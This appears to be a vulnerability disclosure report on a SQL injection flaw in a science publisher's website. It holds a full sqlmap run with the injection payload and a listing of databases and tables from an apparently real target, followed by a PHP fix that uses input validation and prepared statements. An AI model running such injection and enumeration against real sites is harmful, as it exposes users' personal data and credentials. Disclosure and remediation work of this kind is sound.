SQL Injection in a media group of China Science Press

Source: Internet
Author: User
Tags: sybase


Good security...

Detailed description:

root@attack:~# sqlmap -u "http://**.**/s_second.php?id=28"

[sqlmap banner, version 1.0-dev-nongit-20150918, http://**.**.**.**]

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 18:58:47

[18:58:48] [INFO] testing connection to the target URL
[18:58:51] [INFO] heuristics detected web page charset 'gb2312'
[18:58:54] [WARNING] reflective value(s) found and filtering out
[18:58:55] [INFO] testing if the target URL is stable
[18:58:59] [INFO] target URL is stable
[18:58:59] [INFO] testing if GET parameter 'id' is dynamic
[18:58:59] [INFO] confirming that GET parameter 'id' is dynamic
[18:58:59] [WARNING] GET parameter 'id' does not appear dynamic
[18:58:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[18:58:59] [INFO] testing for SQL injection on GET parameter 'id'
[18:59:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:59:07] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:59:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:59:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:59:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:59:07] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:59:14] [INFO] heuristics detected web page charset 'iso-8859-2'
[18:59:16] [INFO] testing 'MySQL inline queries'
[19:00:09] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[19:00:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[19:00:23] [INFO] testing 'PostgreSQL inline queries'
[19:00:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:00:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:00:41] [WARNING] time-based comparison requires larger statistical model, please wait............
[19:01:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[19:01:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:01:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:01:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:01:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:01:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:01:46] [INFO] testing 'Oracle AND time-based blind'
[19:01:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:01:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:02:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:03:06] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=28 AND 2130=2130
---
[19:04:10] [INFO] testing MySQL
[19:04:13] [INFO] confirming MySQL
[19:04:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL >= 5.0.0
[19:04:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'

------------------------------------------------------------------

available databases [3]:
[*] information_schema
[*] sciencep_db
[*] test

[19:18:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'

-----------------------

Three databases.

----------------------

[21:32:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5
[21:32:47] [INFO] fetching tables for database: 'sciencep_db'
[21:32:47] [INFO] fetching number of tables for database 'sciencep_db'
[21:32:47] [INFO] resumed: 158
[21:32:47] [INFO] resumed: 1 discountrate
[21:32:47] [INFO] resumed: 2 order
[21:32:47] [INFO] resumed: 3 orderdetail
[21:32:47] [INFO] resumed: admininfo
[21:32:47] [INFO] resumed: article_t
[21:32:47] [INFO] resumed: ci_sessions
[21:32:47] [INFO] resumed: classification
[21:32:47] [INFO] resumed: column_t
[21:32:47] [INFO] resumed: daorushujibiao
[21:32:47] [INFO] resumed: department
[21:32:47] [INFO] resumed: group_list
[21:32:47] [INFO] resumed: hxhd_addon15
[21:32:47] [INFO] resumed: hxhd_addonarticle
[21:32:47] [INFO] resumed: hxhd_addonflash
[21:32:47] [INFO] resumed: hxhd_addonimages
[21:32:47] [INFO] resumed: hxhd_addonsoft
[21:32:47] [INFO] resumed: hxhd_addonspec
[21:32:47] [INFO] resumed: hxhd_admin
[21:32:47] [INFO] resumed: hxhd_admintype
[21:32:47] [INFO] resuming partial value: hxhd_a
[21:32:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:32:47] [INFO] retrieved:
[21:33:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
Rc
[21:35:00] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
Att
[21:37:11] [INFO] retrieved: hxhd_



-------------------------------------------------

There are 158 tables in the current database, so there is likely a great deal of leakable data. I will not enumerate them one by one.

----------------------------------------------

Purchases on the website are made with a mobile phone number, so the leaked data should include users' phone numbers along with their account names and passwords.

-----------------------------------------------------

I hope the publishing house will send me a book (C Language Programming Tutorial, second edition).

Proof of vulnerability:


Solution:

Filter user input.
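To make the fix concrete, here is the vulnerable pattern beside a hardened handler for the injected `id` parameter. This is an added example, not the publisher's code: it assumes s_second.php selected an article by integer `id`, and the table and column names (article_t, id, title) and the database credentials are hypothetical.

```php
<?php
// Added example, not the publisher's code. Assumes s_second.php selected an
// article by the integer GET parameter "id" (the parameter sqlmap found
// injectable); the table and column names (article_t, id, title) are
// hypothetical, and the database credentials are placeholders.

// Vulnerable form: the raw parameter is spliced into the SQL text, so a value
// such as "28 AND 2130=2130" is executed as SQL. Because true and false
// conditions yield different pages, an attacker learns one bit per request
// (the boolean-based blind technique sqlmap reported above).
function fetch_article_vulnerable(mysqli $db, $rawId)
{
    $sql = "SELECT id, title FROM article_t WHERE id = " . $rawId;
    return $db->query($sql);
}

// Hardened form: (1) reject anything that is not a positive integer before it
// reaches the database, (2) send the value as a bound integer parameter so it
// can never alter the structure of the statement. Step (1) alone is the
// "filter" the report asks for; step (2) is what makes the fix robust.
function fetch_article_safe(mysqli $db, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        header('HTTP/1.1 400 Bad Request');   // header() works on PHP 5.3
        return null;
    }
    $stmt = $db->prepare("SELECT id, title FROM article_t WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($articleId, $title);
    $row = $stmt->fetch() ? array('id' => $articleId, 'title' => $title) : null;
    $stmt->close();
    return $row;
}

// Placeholder credentials; the database name is the one enumerated above.
$db = new mysqli('DB_HOST', 'DB_USER', 'DB_PASS', 'sciencep_db');
if ($db->connect_error) {
    header('HTTP/1.1 500 Internal Server Error');
    exit;
}
$db->set_charset('utf8');
$article = fetch_article_safe($db, isset($_GET['id']) ? $_GET['id'] : '');
```

With the hardened handler, the probe `id=28 AND 2130=2130` is rejected at validation with a 400 response rather than producing a page that differs from the `id=28` baseline, which is the difference sqlmap relies on.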
